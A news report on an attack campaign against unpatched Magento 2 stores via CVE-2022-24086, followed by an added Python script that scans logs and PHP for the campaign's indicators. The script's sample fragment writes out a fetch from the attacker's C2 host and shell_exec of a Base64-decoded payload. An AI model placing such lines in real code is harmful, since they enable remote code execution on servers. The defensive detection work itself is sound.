Magento shopping cart attack targets critical vulnerability revealed in early 2022

Really? You didn't bother to patch a 9.8 severity critical flaw?


Ecommerce stores using Adobe's open source Magento 2 software are being targeted by an ongoing exploitation campaign based on a critical vulnerability that was patched last year, on February 13, 2022.

Security researchers at Akamai say they have identified a server-side template injection campaign aimed at Magento 2 shops that have yet to address CVE-2022-24086, an input validation flaw with a CVSS score of 9.8.

"Unfortunately, businesses find it difficult to properly identify all their assets and patch in a timely manner," said Maxim Zavodchik, director of threat research at Akamai, in an email to The Register.

"Although zero-days and newly disclosed CVEs present a large opportunity for attackers, older CVEs are still being exploited by threat actors to get initial access to sites and networks."

The campaign, as explained in a blog post by Zavodchik and Akamai colleagues Ron Mankivsky, Dennis German, Chen Doytshman, and Tricia Howard, has been underway since at least January 2023.

"The attacker seems to be interested in payment stats from the orders in the victim's Magento store placed in the past 10 days," they said.

This isn't entirely surprising. At least seven threat groups have focused on attacking Magento shops since 2015, according to the security researchers. These groups, referred to collectively as Magecart due to their focus on Magento shopping carts, rely on various malware techniques, such as JavaScript data skimming, to intercept and steal transaction data from ecommerce websites.

Akamai has dubbed the latest campaign "Xurum" because that was the name of the attacker's command-and-control server, at least until Akamai's post on the subject evidently prompted a name change.

Zavodchik said Akamai does not have insight into the number of affected or vulnerable Magento stores. "We are inspecting and blocking incoming attacks targeted at our customers, but our [Web Application Firewall] does not collect information about the customers' Magento version."

The attackers attempted to serve two different payloads from four IP addresses, three associated with service provider Hetzner in Germany and one associated with Shock Hosting in the United States.

"The first variant executes the file_get_contents PHP function to send a request to the attacker’s C2 server xurum.com to determine whether the server is vulnerable to CVE-2022-24086 while the Base64 blob decodes to https://xurum.com/mo," the researchers explain.

The second variant delivers malicious PHP code, obfuscated using Base64 encoding and executed using the shell_exec PHP function, from the xurum server.

The xurum server, when it was operating, was physically located in the Netherlands and operated by Russian hosting biz VDSina.ru. When Akamai checked the server via VirusTotal, it was not rated malicious.

The researchers observed that instead of running the web shell on an attacker-controlled server, the code fetches a web shell from GitHub and, rather than writing it to disk, runs it in memory when the newly created "registration.php" page is accessed.

"The CVE enables arbitrary code execution on the target server," explained Zavodchik. "Attackers use this to pull the web shell from Github and execute it on the victim. The attackers are making a request with the exploit to the vulnerable server, then the exploit is making a request to Github to fetch the web shell and execute it."

The attackers try to prevent unauthorized use of the web shell by requiring the presence of a specific "magemojo000" cookie in the web request as an execution condition. They also use CSS to hide the login page for the web shell off-screen.

To prevent the malicious component from being detected, the attacker code registers the web shell as a new Magento component called "GoogleShoppingAds."
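The indicators the researchers describe (a web shell gated on a "magemojo000" cookie and triggered through a "registration.php" page, Base64-obfuscated PHP run through shell_exec, a fetch from xurum.com, and a planted component named "GoogleShoppingAds") translate directly into defensive checks. The following script is an added example written for this article, not code from Akamai or the Magento project. It assumes access logs in Apache/nginx combined format with the request's Cookie header appended as a trailing quoted field (a hypothetical log customisation), and the log lines and PHP fragment it scans are constructed for illustration.

```python
"""Defensive triage for the Magento web shell campaign described above.

Assumptions (not from the article): access logs are in combined format with the
request's Cookie header appended as a final quoted field, and the sample log
lines and PHP fragment below are constructed for illustration.
"""
import re

# Indicators taken from the article's description of the campaign
SHELL_COOKIE = "magemojo000"          # cookie the web shell requires before it runs
SHELL_PATH = "registration.php"       # page whose access triggers the in-memory shell
C2_HOST = "xurum.com"                 # command-and-control host named in the article
BAD_COMPONENT = "GoogleShoppingAds"   # Magento component name the shell registers as

# Combined log format plus a trailing "%{Cookie}i" field (assumed log customisation)
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "[^"]*" "(?P<cookie>[^"]*)"'
)


def parse_line(line):
    """Parse one access-log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def cookie_names(cookie_header):
    """Return the set of cookie names in a raw Cookie header value."""
    return {p.strip().partition("=")[0] for p in cookie_header.split(";") if p.strip()}


def scan_access_log(lines):
    """Return (line_no, ip, reason) for requests matching the web shell's trigger."""
    findings = []
    for n, line in enumerate(lines, 1):
        rec = parse_line(line)
        if rec is None:
            continue
        has_cookie = SHELL_COOKIE in cookie_names(rec["cookie"])
        hits_shell = rec["path"].split("?", 1)[0].rsplit("/", 1)[-1] == SHELL_PATH
        if has_cookie and hits_shell:
            findings.append((n, rec["ip"], f"{SHELL_PATH} request carrying {SHELL_COOKIE} cookie"))
        elif has_cookie:
            findings.append((n, rec["ip"], f"{SHELL_COOKIE} cookie on {rec['path']}"))
    return findings


# Source patterns mirroring the two payload variants and the component registration
PHP_PATTERNS = [
    (re.compile(r"file_get_contents\s*\(\s*['\"]https?://[^'\"]*" + re.escape(C2_HOST)),
     "remote fetch from known C2 host"),
    (re.compile(r"shell_exec\s*\(\s*base64_decode\s*\("),
     "shell_exec of a Base64-decoded payload"),
    (re.compile(r"ComponentRegistrar::register\s*\([^)]*" + re.escape(BAD_COMPONENT)),
     "registers the known-bad component name"),
]


def scan_php_source(text):
    """Return the reasons a PHP file resembles the campaign's dropped code."""
    return [reason for pattern, reason in PHP_PATTERNS if pattern.search(text)]


# Constructed sample data: documentation-range IPs, no real traffic
SAMPLE_LOG = [
    '203.0.113.7 - - [14/Jan/2023:10:22:31 +0000] "GET /registration.php HTTP/1.1" 200 512 "-" "Mozilla/5.0" "magemojo000=1; PHPSESSID=abc"',
    '198.51.100.4 - - [14/Jan/2023:10:22:40 +0000] "GET /catalog/product/view/id/42 HTTP/1.1" 200 9001 "-" "Mozilla/5.0" "PHPSESSID=def"',
    '203.0.113.7 - - [14/Jan/2023:10:23:02 +0000] "POST /registration.php HTTP/1.1" 200 128 "-" "curl/7.88" "magemojo000=1"',
    '198.51.100.9 - - [14/Jan/2023:10:23:10 +0000] "GET /registration.php HTTP/1.1" 404 64 "-" "Mozilla/5.0" "-"',
]

# Constructed, non-functional fragment shaped like the article's description
SAMPLE_PHP = r"""<?php
$r = file_get_contents("https://xurum.com/mo");
shell_exec(base64_decode($blob));
\Magento\Framework\Component\ComponentRegistrar::register(
    \Magento\Framework\Component\ComponentRegistrar::MODULE, 'Vendor_GoogleShoppingAds', __DIR__);
"""

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print("log line %d from %s: %s" % hit)
    for reason in scan_php_source(SAMPLE_PHP):
        print("php:", reason)
```

The log scan treats the cookie alone as worth a look, because the researchers describe it as the shell's execution condition, while the cookie on a registration.php request is the full trigger. The source scan is deliberately narrow to the behaviours named in the article; a real deployment would pair it with a file-integrity baseline of the Magento code tree so a newly added component stands out regardless of its name.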

"This campaign serves as a practical example of how older vulnerabilities continue to be exploited years after disclosure, as businesses struggle to keep up with patches and security measures," the researchers conclude. ®
